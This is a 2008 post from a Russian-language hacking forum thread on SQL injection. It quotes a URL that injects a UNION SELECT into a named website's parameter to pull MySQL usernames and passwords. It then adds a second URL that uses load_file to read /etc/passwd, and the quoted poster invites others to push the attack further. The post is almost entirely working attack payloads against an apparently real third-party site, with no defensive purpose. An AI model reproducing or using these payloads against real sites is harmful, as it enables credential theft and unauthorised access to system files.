Тема: SQL Инъекции
Показать сообщение отдельно

  #5271  
Старый 07.04.2008, 22:13
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию
Цитата:
Сообщение от bag  
Код:
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10+from+mysql.user/*
кто пройдет дальше отпишите чтоли)
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,lo ad_file('/etc/passwd'),5,6,7,8,9,10+from+mysql.user/*

load_file
 
Ответить с цитированием